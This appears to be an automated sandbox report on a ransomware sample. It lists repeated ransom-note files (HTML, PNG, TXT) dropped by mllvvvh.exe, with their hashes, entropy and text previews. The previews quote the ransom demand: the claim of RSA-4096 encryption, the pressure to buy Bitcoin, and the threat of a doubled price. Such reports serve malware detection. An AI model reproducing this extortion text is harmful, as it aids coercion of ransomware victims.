                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{1e05dd5d-a022-46c5-963c-b20de341170f}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{23cb517f-5073-4e96-a202-7fe6122a2271}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
